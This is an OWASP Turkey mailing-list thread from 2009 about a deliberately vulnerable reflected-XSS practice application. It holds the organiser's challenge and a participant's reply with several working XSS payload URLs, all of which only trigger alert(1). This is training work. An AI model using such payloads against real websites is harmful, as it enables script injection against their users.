<div> </div>
<div>It is enough to send the exploit URL you wrote, also stating the browser it works in. Everything you sent is OK!<br></div>
<div class="gmail_quote">On Monday, 15 June 2009 at 15:50, E. Erdem <span dir="ltr">&lt;<a href="mailto:e2erdem@gmail.com">e2erdem@gmail.com</a>&gt;</span> wrote:<br>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0px 0px 0px 0.8ex; BORDER-LEFT: #ccc 1px solid">4 from me (I could only test them in FF3. Nothing was said about<br>browsers):<br><br>
1- <a href="http://www.webguvenligi.org/xsstb/reflected.php?vector1=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert(1)%3C%2FSCRIPT%3E%22%3E&amp;vector2=&amp;vector3=&amp;vector4=&amp;vector5=&amp;vector6=&amp;vector7=" target="_blank">http://www.webguvenligi.org/xsstb/reflected.php?vector1=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert(1)%3C%2FSCRIPT%3E%22%3E&amp;vector2=&amp;vector3=&amp;vector4=&amp;vector5=&amp;vector6=&amp;vector7=</a><br>
2- <a href="http://www.webguvenligi.org/xsstb/reflected.php?vector1=&amp;vector2=" target="_blank">http://www.webguvenligi.org/xsstb/reflected.php?vector1=&amp;vector2=</a>&lt;IMG+&quot;&quot;&quot;&gt;&lt;SCRIPT&gt;alert(1)&lt;%2FSCRIPT&gt;&quot;&gt;&amp;vector3=&amp;vector4=&amp;vector5=&amp;vector6=&amp;vector7=<br>
4- <a href="http://www.webguvenligi.org/xsstb/reflected.php?vector1=&amp;vector2=&amp;vector3=&amp;vector4=--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(String.fromCharCode(49))%3C%2FSCRIPT%3E&amp;vector5=&amp;vector6=&amp;vector7=" target="_blank">http://www.webguvenligi.org/xsstb/reflected.php?vector1=&amp;vector2=&amp;vector3=&amp;vector4=--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(String.fromCharCode(49))%3C%2FSCRIPT%3E&amp;vector5=&amp;vector6=&amp;vector7=</a><br>
5- <a href="http://www.webguvenligi.org/xsstb/reflected.php?vector1=&amp;vector2=&amp;vector3=&amp;vector4=&amp;vector5=%3CIFRAME+SRC%3D%22javascript%3Aalert(1)%3B%22%3E%3C%2FIFRAME%3E&amp;vector6=&amp;vector7=" target="_blank">http://www.webguvenligi.org/xsstb/reflected.php?vector1=&amp;vector2=&amp;vector3=&amp;vector4=&amp;vector5=%3CIFRAME+SRC%3D%22javascript%3Aalert(1)%3B%22%3E%3C%2FIFRAME%3E&amp;vector6=&amp;vector7=</a><br>
<br>2009/6/15 Bedirhan Urgun &lt;<a href="mailto:bedirhanurgun@gmail.com">bedirhanurgun@gmail.com</a>&gt;:<br>
<div>
<div></div>
<div class="h5">&gt; Hello,<br>&gt; You can access a &quot;playgroup&quot; application where you can learn and<br>&gt; practice different Reflected XSS techniques at <a href="http://www.webguvenligi.org/xsstb/reflected.php" target="_blank">http://www.webguvenligi.org/xsstb/reflected.php</a><br>
&gt; The application has XSS attack vectors that can be applied to 7 parameters<br>&gt; (vector1, vector2, ..., vector7). To the first two people who exploit these<br>&gt; vectors and send them as a reply-all to this mail, like the link I give<br>&gt; below, I will send:<br>
&gt;<br>&gt; 1st place: a 7-day, 7-night trip for 2 to the Maldives<br>&gt; 2nd place: a latest-model car<br>&gt;<br>&gt; Yeah, right!...<br>&gt;<br>&gt; 1st place: an OWASP Membership T-Shirt (L)<br>&gt; 2nd place: an OWASP Membership DVD<br>
&gt;<br>&gt; Example (the first hint is from me):<br>&gt; <a href="http://www.webguvenligi.org/xsstb/reflected.php?vector1=%3Cscript%3Ealert(1)%3C/script%3E" target="_blank">http://www.webguvenligi.org/xsstb/reflected.php?vector1=%3Cscript%3Ealert(1)%3C/script%3E</a><br>
&gt;<br>&gt;<br>&gt; Note 1: it is enough to display 1 in an alert box on the screen<br>&gt; Note 2: what counts is the order of arrival in the owasp-tr mail archives<br>&gt; Note 3: the prizes I wrote last are the valid ones! No &quot;oh, I didn&#39;t see that&quot; later<br>
&gt;<br>&gt; Project post:<br>&gt; <a href="http://www.webguvenligi.org/projeler/reflected-xss-oyun-grubu.html" target="_blank">http://www.webguvenligi.org/projeler/reflected-xss-oyun-grubu.html</a><br>&gt; --<br>&gt; Bedirhan Urgun<br>
&gt; <a href="http://www.webguvenligi.org/" target="_blank">http://www.webguvenligi.org</a><br>&gt; <a href="http://www.owasp.org/index.php/Turkey" target="_blank">http://www.owasp.org/index.php/Turkey</a><br>&gt;<br>&gt; To subscribe to the Turkish Web Application Security E-Mail List:<br>
&gt; <a href="https://lists.owasp.org/mailman/listinfo/owasp-turkey" target="_blank">https://lists.owasp.org/mailman/listinfo/owasp-turkey</a><br>&gt;<br></div></div>&gt; _______________________________________________<br>
&gt; Owasp-turkey mailing list<br>&gt; <a href="mailto:Owasp-turkey@lists.owasp.org">Owasp-turkey@lists.owasp.org</a><br>
<div>
<div></div>
<div class="h5">&gt; <a href="https://lists.owasp.org/mailman/listinfo/owasp-turkey" target="_blank">https://lists.owasp.org/mailman/listinfo/owasp-turkey</a><br>&gt;<br>&gt;<br></div></div></blockquote></div><br><br clear="all">

<div></div><br>-- <br>Bedirhan Urgun<br><a href="http://www.webguvenligi.org">http://www.webguvenligi.org</a><br><a href="http://www.owasp.org/index.php/Turkey">http://www.owasp.org/index.php/Turkey</a><br><br>To subscribe to the Turkish Web Application Security E-Mail List: <br>
<a href="https://lists.owasp.org/mailman/listinfo/owasp-turkey">https://lists.owasp.org/mailman/listinfo/owasp-turkey</a><br>